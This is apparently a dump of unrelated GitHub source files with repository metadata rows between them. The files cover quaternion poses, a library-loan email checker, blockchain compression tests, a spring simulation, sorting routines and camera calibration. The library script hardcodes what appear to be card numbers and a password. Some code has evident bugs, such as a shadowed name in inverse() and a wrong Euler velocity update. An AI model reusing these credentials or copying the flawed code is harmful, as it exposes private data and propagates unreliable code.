R = quaternion_to_rotation_matrix(self.quat)
T = torch.eye(4, device=R.device, dtype=R.dtype).repeat([len(self), 1, 1])
T[:, :3, :3] = R
T[:, :3, -1] = self.tvec
return T
@property
def rotation_matrix(self):
"""Returns the 3x3 rotation matrix (R)
Returns
----------
result: torch.FloatTensor (B33)
Bx3x3 rotation matrix
"""
return quaternion_to_rotation_matrix(self.quat)
@property
def translation(self):
"""Return the translation component of the pose as a torch.Tensor.
Returns
----------
tvec: torch.FloatTensor (B3)
Translation component of the Pose object.
"""
return self.tvec
def repeat(self, B):
"""Repeat the QuaternionPose tensor"""
self.quat = self.quat.repeat([B,1])
self.tvec = self.tvec.repeat([B,1])
assert self.quat.dim() == self.tvec.dim() == 2, (
'Attempting to repeat along the batch dimension failed, quat/tvec dims: {}/{}'
.format(self.quat.dim(), self.tvec.dim()))
return self
def to(self, *args, **kwargs):
"""Move object to specified device"""
self.quat = self.quat.to(*args, **kwargs)
self.tvec = self.tvec.to(*args, **kwargs)
return self
def __mul__(self, other):
"""Matrix multiplication overloading for pose-pose and pose-point
transformations.
Parameters
----------
other: Pose or torch.FloatTensor
Either Pose, or 3-D points torch.FloatTensor (B3N or B3HW).
Returns
----------
Pose
Transformed pose, or 3-D points via rigid-transform on the manifold,
with same type as other.
"""
if isinstance(other, QuaternionPose):
return self.transform_pose(other)
elif isinstance(other, torch.Tensor):
if other.shape[1] == 3 and other.dim() > 2:
assert other.dim() == 3 or other.dim() == 4
return self.transform_points(other)
else:
raise ValueError('Unknown tensor dimensions {}'.format(other.shape))
elif isinstance(other, BoundingBox3D):
raise NotImplementedError()
else:
raise NotImplementedError()
def transform_pose(self, other):
"""Left-multiply (oplus) rigid-body transformation.
Parameters
----------
other: QuaternionPose
Pose to left-multiply with (self * other)
Returns
----------
QuaternionPose
Transformed Pose via rigid-transform on the manifold.
"""
assert isinstance(other, QuaternionPose), (
'Other pose is not QuaternionPose')
tvec = qrot(self.quat, other.tvec) + self.tvec
quat = qmul(self.quat, other.quat)
return self.__class__(quat, tvec)
def transform_points(self, X0):
"""Transform 3-D points from one frame to another via rigid-body transformation.
Note: This function can be modified to do batched rotation operation
with quaternions directly.
Parameters
----------
X0: torch.FloatTensor (B3N or B3HW)
3-D points in torch.FloatTensor (shaped either B3N or B3HW).
Returns
----------
torch.FloatTensor (B3N or B3HW)
Transformed 3-D points with the same shape as X0.
"""
assert X0.shape[1] == 3 and len(X0) == len(self), (
'Batch sizes do not match pose={}, X={}, '.format(self.__repr__(), X0.shape))
B, shape = len(X0), X0.shape[2:]
R = quaternion_to_rotation_matrix(self.quat)
X1 = R.bmm(X0.view(B, 3, -1)) + self.tvec.unsqueeze(-1)
return X1.view(B, 3, *shape)
def inverse(self):
"""Invert T=[trans, quaternion] as a rigid transformation.
Returns:
QuaternionPose: Pose batch inverted on the appropriate manifold.
"""
qinv = qinv(self.quat)
tinv = qrot(qinv, -self.tvec)
return QuaternionPose(qinv, tinv)
| [
"wwwrrry612@gmail.com"
] | wwwrrry612@gmail.com |
367a3facb1999817f6db62d7395cf8ba714284bf | 3e563bd01bf57fa73818e9ddbd61bc15acae3d61 | /library_service.py | 069d08e78dcbb065c75b5daeff3416c3af19d3aa | [] | no_license | jancvek/library-check | 08032548fd6c3a742ad2c039f0bfdca7e73be705 | 5614cab69a205b74c670b67165526e7f9c92402c | refs/heads/master | 2021-06-28T03:00:18.009735 | 2020-10-31T14:05:03 | 2020-10-31T14:05:03 | 228,236,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,444 | py | import time
import datetime
import smtplib
from email.message import EmailMessage
import os
currPath = os.path.dirname(os.path.abspath(__file__))
parentPath = os.path.dirname(currPath)
libPath = parentPath+'/jan-lib'
# tole moramo dodati da lahko importamo py file iz drugih lokacij
import sys
sys.path.insert(1, libPath)
import jan_cobiss
import jan_email
import jan_enum
import jan_sqlite
def checkLibrary():
sqlConn = jan_sqlite.create_connection(currPath+"/library.db")
print(currPath+"/library.db")
email = jan_email.Email()
cobissJan = jan_cobiss.Cobiss("0104232","knjiga")
cobissJan.checkCobiss()
if sqlConn:
print("sqlConn dela")
else:
print("sqlConn ne dela!")
with sqlConn:
params1 = "created_by_service,library_user,status,days_to_expire,text"
values1 = ('1','JAN',str(cobissJan.status.name),cobissJan.minDays,cobissJan.error)
jan_sqlite.insert_data(sqlConn, 'data', params1, values1)
if cobissJan.isError:
print(cobissJan.error)
email.sentEmail(['jan.cvek@gmail.com'],'Knjiznica API - ERROR!','Error Knjiznica Jan: '+cobissJan.error)
else:
if cobissJan.status == jan_enum.EStatusLibrary.EXPIRE_SOON:
email.sentEmail(['jan.cvek@gmail.com'],'Knjiznica API - VRNI!','Knjiznica Jan se: '+str(cobissJan.minDays)+' dni do preteka!')
print(str(cobissJan.minDays))
print(str(cobissJan.status))
cobissMasa = jan_cobiss.Cobiss("0107170","knjiga")
cobissMasa.checkCobiss()
with sqlConn:
params2 = "created_by_service,library_user,status,days_to_expire,text"
values2 = ('1','MASA',str(cobissMasa.status.name),cobissMasa.minDays,cobissMasa.error)
jan_sqlite.insert_data(sqlConn, 'data', params2, values2)
if cobissMasa.isError:
print(cobissMasa.error)
email.sentEmail(['jan.cvek@gmail.com'],'Knjiznica API - ERROR!','Error Knjiznica Masa: '+cobissMasa.error)
else:
if cobissMasa.status == jan_enum.EStatusLibrary.EXPIRE_SOON:
email.sentEmail(['jan.cvek@gmail.com'],'Knjiznica API - VRNI!','Knjiznica Masa se: '+str(cobissMasa.minDays)+' dni do preteka!')
print(str(cobissMasa.minDays))
print(str(cobissMasa.status))
# tole se zazene ko je to main program ni klican iz druge kode
if __name__ == '__main__':
checkLibrary() | [
"jan.cvek@gmail.com"
] | jan.cvek@gmail.com |
da4d7b80c470a5ea6762ba816acdd9922c6b0eaf | 05a211233ccb01ecd2c12367548cba65bbdbc5d9 | /examples/02relative/app/en/__init__.py | 771d13b64c475a7ca1ad41ba952a579d17934208 | [] | no_license | podhmo/miniconfig | 94ee7fa6345816daa83a74b1cbfb40592f221fbb | 4cee752fd965c8094ed9d1ff1c33e531e88e479c | refs/heads/master | 2021-05-21T11:49:14.836184 | 2021-03-13T14:06:27 | 2021-03-13T14:06:57 | 26,328,967 | 3 | 1 | null | 2020-07-09T19:24:51 | 2014-11-07T16:58:28 | Python | UTF-8 | Python | false | false | 157 | py | def includeme(config):
config.include(".spring:include")
config.include(".summer")
config.include("./autumn")
config.include("../en/winter")
| [
"ababjam61+github@gmail.com"
] | ababjam61+github@gmail.com |
0b359de6edb5995644e1b492351b5a6eff68069c | 1020a87ba3569c879478b6a88f73da606f204c34 | /tests/generator/test_compression.py | c5c000d40ba6e08eaf9ff7457e1ef520b8fa4ca6 | [
"Apache-2.0"
] | permissive | MIGPOOL/test-blockchain | deeceaa5d7c6d24e528092ef32036aff8149baff | 567fd1265b6a27f2f4e21c7787e39072e4b7c085 | refs/heads/main | 2023-08-22T03:27:19.638361 | 2021-10-26T22:42:42 | 2021-10-26T22:42:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,156 | py | # flake8: noqa: F501
from dataclasses import dataclass
from typing import List, Any
from unittest import TestCase
from greendoge.full_node.bundle_tools import (
bundle_suitable_for_compression,
compressed_coin_spend_entry_list,
compressed_spend_bundle_solution,
match_standard_transaction_at_any_index,
simple_solution_generator,
spend_bundle_to_serialized_coin_spend_entry_list,
)
from greendoge.full_node.generator import run_generator, create_generator_args
from greendoge.full_node.mempool_check_conditions import get_puzzle_and_solution_for_coin
from greendoge.types.blockchain_format.program import Program, SerializedProgram, INFINITE_COST
from greendoge.types.generator_types import BlockGenerator, CompressorArg, GeneratorArg
from greendoge.types.spend_bundle import SpendBundle
from greendoge.util.byte_types import hexstr_to_bytes
from greendoge.util.ints import uint32
from greendoge.wallet.puzzles.load_clvm import load_clvm
from tests.core.make_block_generator import make_spend_bundle
from clvm import SExp
import io
from clvm.serialize import sexp_from_stream
from clvm_tools import binutils
TEST_GEN_DESERIALIZE = load_clvm("test_generator_deserialize.clvm", package_or_requirement="greendoge.wallet.puzzles")
DESERIALIZE_MOD = load_clvm("greendogelisp_deserialisation.clvm", package_or_requirement="greendoge.wallet.puzzles")
DECOMPRESS_PUZZLE = load_clvm("decompress_puzzle.clvm", package_or_requirement="greendoge.wallet.puzzles")
DECOMPRESS_CSE = load_clvm("decompress_coin_spend_entry.clvm", package_or_requirement="greendoge.wallet.puzzles")
DECOMPRESS_CSE_WITH_PREFIX = load_clvm(
"decompress_coin_spend_entry_with_prefix.clvm", package_or_requirement="greendoge.wallet.puzzles"
)
DECOMPRESS_BLOCK = load_clvm("block_program_zero.clvm", package_or_requirement="greendoge.wallet.puzzles")
TEST_MULTIPLE = load_clvm("test_multiple_generator_input_arguments.clvm", package_or_requirement="greendoge.wallet.puzzles")
Nil = Program.from_bytes(b"\x80")
original_generator = hexstr_to_bytes(
"ff01ffffffa00000000000000000000000000000000000000000000000000000000000000000ff830186a080ffffff02ffff01ff02ffff01ff02ffff03ff0bffff01ff02ffff03ffff09ff05ffff1dff0bffff1effff0bff0bffff02ff06ffff04ff02ffff04ff17ff8080808080808080ffff01ff02ff17ff2f80ffff01ff088080ff0180ffff01ff04ffff04ff04ffff04ff05ffff04ffff02ff06ffff04ff02ffff04ff17ff80808080ff80808080ffff02ff17ff2f808080ff0180ffff04ffff01ff32ff02ffff03ffff07ff0580ffff01ff0bffff0102ffff02ff06ffff04ff02ffff04ff09ff80808080ffff02ff06ffff04ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff018080ffff04ffff01b081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3ff018080ffff80ffff01ffff33ffa06b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9ff830186a08080ff8080808080"
) # noqa
gen1 = b"aaaaaaaaaa" + original_generator
gen2 = b"bb" + original_generator
FAKE_BLOCK_HEIGHT1 = uint32(100)
FAKE_BLOCK_HEIGHT2 = uint32(200)
@dataclass(frozen=True)
class MultipleCompressorArg:
arg: List[CompressorArg]
split_offset: int
def create_multiple_ref_generator(args: MultipleCompressorArg, spend_bundle: SpendBundle) -> BlockGenerator:
"""
Decompress a transaction by referencing bytes from multiple input generator references
"""
compressed_cse_list = compressed_coin_spend_entry_list(spend_bundle)
program = TEST_MULTIPLE.curry(
DECOMPRESS_PUZZLE,
DECOMPRESS_CSE_WITH_PREFIX,
args.arg[0].start,
args.arg[0].end - args.split_offset,
args.arg[1].end - args.split_offset,
args.arg[1].end,
compressed_cse_list,
)
# TODO aqk: Improve ergonomics of CompressorArg -> GeneratorArg conversion
generator_args = [
GeneratorArg(FAKE_BLOCK_HEIGHT1, args.arg[0].generator),
GeneratorArg(FAKE_BLOCK_HEIGHT2, args.arg[1].generator),
]
return BlockGenerator(program, generator_args)
def spend_bundle_to_coin_spend_entry_list(bundle: SpendBundle) -> List[Any]:
r = []
for coin_spend in bundle.coin_spends:
entry = [
coin_spend.coin.parent_coin_info,
sexp_from_stream(io.BytesIO(bytes(coin_spend.puzzle_reveal)), SExp.to),
coin_spend.coin.amount,
sexp_from_stream(io.BytesIO(bytes(coin_spend.solution)), SExp.to),
]
r.append(entry)
return r
class TestCompression(TestCase):
def test_spend_bundle_suitable(self):
sb: SpendBundle = make_spend_bundle(1)
assert bundle_suitable_for_compression(sb)
def test_compress_spend_bundle(self):
pass
def test_multiple_input_gen_refs(self):
start1, end1 = match_standard_transaction_at_any_index(gen1)
start2, end2 = match_standard_transaction_at_any_index(gen2)
ca1 = CompressorArg(FAKE_BLOCK_HEIGHT1, SerializedProgram.from_bytes(gen1), start1, end1)
ca2 = CompressorArg(FAKE_BLOCK_HEIGHT2, SerializedProgram.from_bytes(gen2), start2, end2)
prefix_len1 = end1 - start1
prefix_len2 = end2 - start2
assert prefix_len1 == prefix_len2
prefix_len = prefix_len1
results = []
for split_offset in range(prefix_len):
gen_args = MultipleCompressorArg([ca1, ca2], split_offset)
spend_bundle: SpendBundle = make_spend_bundle(1)
multi_gen = create_multiple_ref_generator(gen_args, spend_bundle)
cost, result = run_generator(multi_gen, INFINITE_COST)
results.append(result)
assert result is not None
assert cost > 0
assert all(r == results[0] for r in results)
def test_compressed_block_results(self):
sb: SpendBundle = make_spend_bundle(1)
start, end = match_standard_transaction_at_any_index(original_generator)
ca = CompressorArg(uint32(0), SerializedProgram.from_bytes(original_generator), start, end)
c = compressed_spend_bundle_solution(ca, sb)
s = simple_solution_generator(sb)
assert c != s
cost_c, result_c = run_generator(c, INFINITE_COST)
cost_s, result_s = run_generator(s, INFINITE_COST)
print(result_c)
assert result_c is not None
assert result_s is not None
assert result_c == result_s
def test_get_removals_for_single_coin(self):
sb: SpendBundle = make_spend_bundle(1)
start, end = match_standard_transaction_at_any_index(original_generator)
ca = CompressorArg(uint32(0), SerializedProgram.from_bytes(original_generator), start, end)
c = compressed_spend_bundle_solution(ca, sb)
removal = sb.coin_spends[0].coin.name()
error, puzzle, solution = get_puzzle_and_solution_for_coin(c, removal, INFINITE_COST)
assert error is None
assert bytes(puzzle) == bytes(sb.coin_spends[0].puzzle_reveal)
assert bytes(solution) == bytes(sb.coin_spends[0].solution)
# Test non compressed generator as well
s = simple_solution_generator(sb)
error, puzzle, solution = get_puzzle_and_solution_for_coin(s, removal, INFINITE_COST)
assert error is None
assert bytes(puzzle) == bytes(sb.coin_spends[0].puzzle_reveal)
assert bytes(solution) == bytes(sb.coin_spends[0].solution)
def test_spend_byndle_coin_spend(self):
for i in range(0, 10):
sb: SpendBundle = make_spend_bundle(i)
cs1 = SExp.to(spend_bundle_to_coin_spend_entry_list(sb)).as_bin()
cs2 = spend_bundle_to_serialized_coin_spend_entry_list(sb)
assert cs1 == cs2
class TestDecompression(TestCase):
def __init__(self, *args, **kwargs):
super(TestDecompression, self).__init__(*args, **kwargs)
self.maxDiff = None
def test_deserialization(self):
self.maxDiff = None
cost, out = DESERIALIZE_MOD.run_with_cost(INFINITE_COST, [bytes(Program.to("hello"))])
assert out == Program.to("hello")
def test_deserialization_as_argument(self):
self.maxDiff = None
cost, out = TEST_GEN_DESERIALIZE.run_with_cost(
INFINITE_COST, [DESERIALIZE_MOD, Nil, bytes(Program.to("hello"))]
)
print(bytes(Program.to("hello")))
print()
print(out)
assert out == Program.to("hello")
def test_decompress_puzzle(self):
cost, out = DECOMPRESS_PUZZLE.run_with_cost(
INFINITE_COST, [DESERIALIZE_MOD, b"\xff", bytes(Program.to("pubkey")), b"\x80"]
)
print()
print(out)
# An empty CSE is invalid. (An empty CSE list may be okay)
# def test_decompress_empty_cse(self):
# cse0 = binutils.assemble("()")
# cost, out = DECOMPRESS_CSE.run_with_cost(INFINITE_COST, [DESERIALIZE_MOD, DECOMPRESS_PUZZLE, b"\xff", b"\x80", cse0])
# print()
# print(out)
def test_decompress_cse(self):
"""Decompress a single CSE / CoinSpendEntry"""
cse0 = binutils.assemble(
"((0x0000000000000000000000000000000000000000000000000000000000000000 0x0186a0) (0xb081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3 (() (q (51 0x6b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9 0x0186a0)) ())))"
) # noqa
cost, out = DECOMPRESS_CSE.run_with_cost(
INFINITE_COST, [DESERIALIZE_MOD, DECOMPRESS_PUZZLE, b"\xff", b"\x80", cse0]
)
print()
print(out)
def test_decompress_cse_with_prefix(self):
cse0 = binutils.assemble(
"((0x0000000000000000000000000000000000000000000000000000000000000000 0x0186a0) (0xb081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3 (() (q (51 0x6b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9 0x0186a0)) ())))"
) # noqa
start = 2 + 44
end = start + 238
prefix = original_generator[start:end]
# (deserialize decompress_puzzle puzzle_prefix cse)
cost, out = DECOMPRESS_CSE_WITH_PREFIX.run_with_cost(
INFINITE_COST, [DESERIALIZE_MOD, DECOMPRESS_PUZZLE, prefix, cse0]
)
print()
print(out)
def test_block_program_zero(self):
"Decompress a list of CSEs"
self.maxDiff = None
cse1 = binutils.assemble(
"(((0x0000000000000000000000000000000000000000000000000000000000000000 0x0186a0) (0xb081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3 (() (q (51 0x6b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9 0x0186a0)) ()))))"
) # noqa
cse2 = binutils.assemble(
"""
(
((0x0000000000000000000000000000000000000000000000000000000000000000 0x0186a0)
(0xb081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3
(() (q (51 0x6b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9 0x0186a0)) ()))
)
((0x0000000000000000000000000000000000000000000000000000000000000001 0x0186a0)
(0xb0a6207f5173ec41491d9f2c1b8fff5579e13703077e0eaca8fe587669dcccf51e9209a6b65576845ece5f7c2f3229e7e3
(() (q (51 0x24254a3efc3ebfac9979bbe0d615e2eda043aa329905f65b63846fa24149e2b6 0x0186a0)) ())))
)
"""
) # noqa
start = 2 + 44
end = start + 238
# (mod (decompress_puzzle decompress_coin_spend_entry start end compressed_cses deserialize generator_list reserved_arg)
# cost, out = DECOMPRESS_BLOCK.run_with_cost(INFINITE_COST, [DECOMPRESS_PUZZLE, DECOMPRESS_CSE, start, Program.to(end), cse0, DESERIALIZE_MOD, bytes(original_generator)])
cost, out = DECOMPRESS_BLOCK.run_with_cost(
INFINITE_COST,
[
DECOMPRESS_PUZZLE,
DECOMPRESS_CSE_WITH_PREFIX,
start,
Program.to(end),
cse2,
DESERIALIZE_MOD,
[bytes(original_generator)],
],
)
print()
print(out)
def test_block_program_zero_with_curry(self):
self.maxDiff = None
cse1 = binutils.assemble(
"(((0x0000000000000000000000000000000000000000000000000000000000000000 0x0186a0) (0xb081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3 (() (q (51 0x6b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9 0x0186a0)) ()))))"
) # noqa
cse2 = binutils.assemble(
"""
(
((0x0000000000000000000000000000000000000000000000000000000000000000 0x0186a0)
(0xb081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3
(() (q (51 0x6b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9 0x0186a0)) ()))
)
((0x0000000000000000000000000000000000000000000000000000000000000001 0x0186a0)
(0xb0a6207f5173ec41491d9f2c1b8fff5579e13703077e0eaca8fe587669dcccf51e9209a6b65576845ece5f7c2f3229e7e3
(() (q (51 0x24254a3efc3ebfac9979bbe0d615e2eda043aa329905f65b63846fa24149e2b6 0x0186a0)) ())))
)
"""
) # noqa
start = 2 + 44
end = start + 238
# (mod (decompress_puzzle decompress_coin_spend_entry start end compressed_cses deserialize generator_list reserved_arg)
# cost, out = DECOMPRESS_BLOCK.run_with_cost(INFINITE_COST, [DECOMPRESS_PUZZLE, DECOMPRESS_CSE, start, Program.to(end), cse0, DESERIALIZE_MOD, bytes(original_generator)])
p = DECOMPRESS_BLOCK.curry(DECOMPRESS_PUZZLE, DECOMPRESS_CSE_WITH_PREFIX, start, Program.to(end))
cost, out = p.run_with_cost(INFINITE_COST, [cse2, DESERIALIZE_MOD, [bytes(original_generator)]])
print()
print(p)
print(out)
p_with_cses = DECOMPRESS_BLOCK.curry(
DECOMPRESS_PUZZLE, DECOMPRESS_CSE_WITH_PREFIX, start, Program.to(end), cse2, DESERIALIZE_MOD
)
generator_args = create_generator_args([SerializedProgram.from_bytes(original_generator)])
cost, out = p_with_cses.run_with_cost(INFINITE_COST, generator_args)
print()
print(p_with_cses)
print(out)
| [
"83430349+lionethan@users.noreply.github.com"
] | 83430349+lionethan@users.noreply.github.com |
95769dc3343484a36dee41a90380214fab208a59 | 5761f160cdbd97b8c69601cd85bf41788b257ace | /Laboratorios/resorte_euler.py | b773c2a5be31fd94b0f6761d8d3acfcd73b2e572 | [] | no_license | daavera/METODOS | 3c63d7636ad880cad96cc6ef4f488c4e7663af58 | 775b47de08bf729e1388be46b61c5456f4524098 | refs/heads/master | 2020-12-02T05:24:41.789369 | 2017-07-30T18:00:34 | 2017-07-30T18:00:34 | 96,900,922 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 979 | py | import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
g = 9.8
k = 42.0
mu = 0.15
m = 0.25
h = 0.001
min_t = 0
max_t = 5
n_points = int((max_t - min_t)/h)
t = np.zeros(n_points)
x = np.zeros(n_points)
dx = np.zeros(n_points)
x[0] = 0.2
dx[0] = 0.0
def func_prime_1(t,x,dx):
return dx
def func_prime_2(t,x,dx):
if(dx >= 0):
d2 = (-k/m)*x-(mu*g)
else:
d2 = (-k/m)*x+(mu*g)
return d2
def Euler_step(t0,x0,dx0):
t_new = t0 +h
x_new = func_prime_1(t0,x0,dx0)*h + x0
dx_new = func_prime_2(t0,x0,dx0)*h + func_prime_1(t0,x0,dx0)
return t_new, x_new, dx_new
for i in range(1,n_points):
t[i], x[i], dx[i] = Euler_step(t[i-1],x[i-1],dx[i-1])
fig, ax1 = plt.subplots()
plt.plot(t,x, linestyle='--', alpha=0.3)
line, = ax1.plot(t,x, '-o')
def animate(i):
line.set_data(t[i],x[i]) # update the data
return line,
ani = animation.FuncAnimation(fig, animate, n_points,
interval=1)
plt.show() | [
"da.avila@uniandes.edu.co"
] | da.avila@uniandes.edu.co |
193b3e6cc93d153726e8746368d795219d71f305 | a3775815cab7a6ece5f52a0147df3f306255aa99 | /code/python/archive/c0112_plot_truncate.py | f4df66adcad81fe9192323685661eb4872a0a541 | [
"MIT"
] | permissive | jesnyder/MeasuringStress | d7c5c900f6f4fb38d3c2ea2d31285b2ab8db8455 | c512bc352cc71e5a354980d3d509f03abec71e79 | refs/heads/main | 2023-05-29T04:16:28.155977 | 2021-06-10T01:35:08 | 2021-06-10T01:35:08 | 375,521,391 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,749 | py | from c0101_retrieve_ref import retrieve_ref
from c0101_retrieve_ref import retrieve_ref_color
from c0101_retrieve_ref import retrieve_sensor_unit
from c0102_timestamp import timestamp_source
from c0109_retrieve_meta import retrieve_meta
from c0111_retrieve_analyzed import retrieve_analyzed
import os
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def plot_truncate():
"""
compare the curves to verify the end of the record was properly found
plot the source measurements for temperature
plot the timestamped data for the temperature
plot the truncated data
plot the timestamped and truncated on the same plot
"""
print("begin plotting truncated data")
study_list = retrieve_ref('study_list')
sensor_list = retrieve_ref('sensor_list')
analysis_list = retrieve_ref('analysis_list')
analysis_type = 'truncate'
for study in study_list:
df_meta = retrieve_meta(study)
source_path = list(df_meta['source_path'])
for record in source_path:
row_num, col_num, plot_num = len(sensor_list), 1, 0
plot_width, plot_height = col_num*25, row_num*6
plt.figure(figsize=(plot_width, plot_height))
for sensor in sensor_list:
# plot the truncated record
plot_num += 1
plt.subplot(row_num, col_num, plot_num)
df = retrieve_analyzed(study, analysis_type, record, sensor)
valueColor = retrieve_ref_color(str('color_' + str(analysis_type)))
plt.scatter(df['timeMinutes'], df['measurement'], color = valueColor, label = str(analysis_type))
plt.title( analysis_type + ' ' + record + ' ' + sensor)
plt.xlabel('Time (minutes)')
sensor_unit =retrieve_sensor_unit(sensor)
plt.ylabel(str(sensor) + ' ( ' + str(sensor_unit) + ' )')
plt.legend(bbox_to_anchor=(1, 0.5, 0.3, 0.2), loc='upper left')
# save the plot
plot_path = os.path.join(study, 'plot')
if not os.path.isdir(plot_path): os.mkdir(plot_path)
plot_path = os.path.join(study, 'plot', analysis_type)
if not os.path.isdir(plot_path): os.mkdir(plot_path)
plot_path = os.path.join(study, 'plot', analysis_type, record)
if not os.path.isdir(plot_path): os.mkdir(plot_path)
plot_file = os.path.join(plot_path, sensor + '.png')
plt.savefig(plot_file, bbox_inches='tight')
print('plotting truncated data for: ' + str(plot_file))
print("completed plotting truncated data")
| [
"jesyndre@gmail.com"
] | jesyndre@gmail.com |
8a3197965c72c05d02eb89c22ae9fd6abe9a2727 | 2331d06694b8b56ce0894f7353a2c6a4a869bb01 | /fimod/models/__init__.py | 6be4a62514cbe0226131db2c85112dcd1bee50c0 | [
"MIT"
] | permissive | Miksus/Fimod | da2bbb0d23f96e85976ccb1edb1cabc8495fb147 | 357ae2fa5693cf5170046c7387e47bafa591b3b8 | refs/heads/master | 2020-05-17T13:24:47.541762 | 2019-05-11T17:38:34 | 2019-05-11T17:38:34 | 183,734,221 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 26 | py | from .instruments import * | [
"koli.mikael@gmail.com"
] | koli.mikael@gmail.com |
6da8896820cb21775182cc8b2f30d43f369eae43 | 803176d4f2798989623c62f091f0d5cca687aad3 | /sorting_recursive.py | 7d2426d95ea2377f69e96f89c1c668f1d448098d | [] | no_license | Tylerholland12/CS2-1 | 79986bb437e4c517d80eb9ba198226cea3e83471 | a095d23c48c19926ad6fd9be55fb980904dcc495 | refs/heads/main | 2023-01-31T00:20:48.603002 | 2020-12-08T14:33:42 | 2020-12-08T14:33:42 | 304,582,069 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,944 | py | #!python
def merge(items1, items2):
"""Merge given lists of items, each assumed to already be in sorted order,
and return a new list containing all items in sorted order.
TODO: Running time: ??? Why and under what conditions?
TODO: Memory usage: ??? Why and under what conditions?"""
# create new empty array
new_sorted_list = []
# create a new variable to store the length of each list
len_items1 = len(items1)
len_items2 = len(items2)
# set a variable for each list index and set to 0
i = j = 0
# check if index is less than items
while i < len_items1 and j < len_items2:
# write a conditional to check if one index is less than the other
if items1[i] <= items2[j]:
new_sorted_list.append(items1[i])
i+=1
# do the opposite of the first conditional
else:
new_sorted_list.append(items2[j])
j+=1
# append the items to the new list
while i < len_items1:
new_sorted_list.append(items1[i])
i+=1
# append the items to the new list
while j < len_items2:
new_sorted_list.append(items2[j])
j+=1
# return new list
return new_sorted_list
def merge_sort(items):
"""Sort given items by splitting list into two approximately equal halves,
sorting each recursively, and merging results into a list in sorted order.
TODO: Running time: ??? Why and under what conditions?
TODO: Memory usage: ??? Why and under what conditions?"""
# base case
if len(items) <= 1:
return items
# divide array into two parts
mid = len(items) // 2
# slice first half of list
left = items[:mid]
# slice second half of list
right = items[mid:]
# recursive call on left
left = merge_sort(left)
# recursive call on right
right = merge_sort(right)
# merge two together
return merge(left, right)
def quick_sort(items, low=None, high=None):
"""Sort given items in place by partitioning items in range `[low...high]`
around a pivot item and recursively sorting each remaining sublist range.
TODO: Best case running time: ??? Why and under what conditions?
TODO: Worst case running time: ??? Why and under what conditions?
TODO: Memory usage: ??? Why and under what conditions?"""
# base case
length = len(items)
if length <= 1:
return items
else:
pivot = items.pop()
# create new empty arrays
low = []
high = []
# loop through and see if the items are greater than pivot
# append items to high
for item in items:
if item > pivot:
high.append(item)
# append items low
else:
low.append(item)
return quick_sort(low) + [pivot] + quick_sort(high)
if __name__ == "__main__":
items = [12, 23, 5, 2, 1, 43, 6, 34, 9]
print(quick_sort(items))
print(merge_sort(items)) | [
"tyler.holland@students.makeschool.com"
] | tyler.holland@students.makeschool.com |
e966da96ef00655ecfcb50ad075270f801c7e332 | b25fe1ee3ddf0ae068fe25a2a9d579543719c4b5 | /camera_calibration.py | 73db067d199904def97f90b083ea36040e1a11dc | [] | no_license | Erazor1980/CarND-P4 | feda18b7be46835d025db8221b314d5730442922 | 0326dea0e43437320553c2d6b119a2dfbcdfcc52 | refs/heads/master | 2021-01-01T04:23:25.309347 | 2017-07-17T21:49:34 | 2017-07-17T21:49:34 | 97,169,337 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,386 | py | import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import glob
# pre-calculated values -> for faster debugging / coding
'''
Camera matrix:
[[ 1.15396093e+03 0.00000000e+00 6.69705359e+02]
[ 0.00000000e+00 1.14802495e+03 3.85656232e+02]
[ 0.00000000e+00 0.00000000e+00 1.00000000e+00]]
Distortion coefficients:
[[ -2.41017968e-01 -5.30720497e-02 -1.15810318e-03 -1.28318544e-04 2.67124303e-02]]
'''
def get_precalculated_calibraton():
mtx = np.array( [[ 1.15396093e+03, 0.00000000e+00, 6.69705359e+02],
[ 0.00000000e+00, 1.14802495e+03, 3.85656232e+02],
[ 0.00000000e+00, 0.00000000e+00, 1.00000000e+00]])
dist = np.array([[ -2.41017968e-01, -5.30720497e-02, -1.15810318e-03, -1.28318544e-04, 2.67124303e-02]])
return mtx, dist
# for showing found corners for each image
def calibrate_camera( show_corner_images = False ):
img_points = [] # 2D points in image plane
obj_points = [] # 3d points in real world
# preparation of object points (same for all images)
objp = np.zeros((6 * 9, 3), np.float32)
objp[:,:2] = np.mgrid[0:9, 0:6].T.reshape(-1,2) # x, y coordinates, z = 0
# store calibration image names in a list
calib_images = glob.glob('./camera_cal/calibration*.jpg')
print("Loading images and finding chessboard corners...")
for img_name in calib_images:
# load current image
img = mpimg.imread(img_name)
# convert it to grayscale
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# find the chessboard corners
ret, corners = cv2.findChessboardCorners(gray, (9, 6))
# add object points and image points if corners found
if ret == True:
img_points.append(corners)
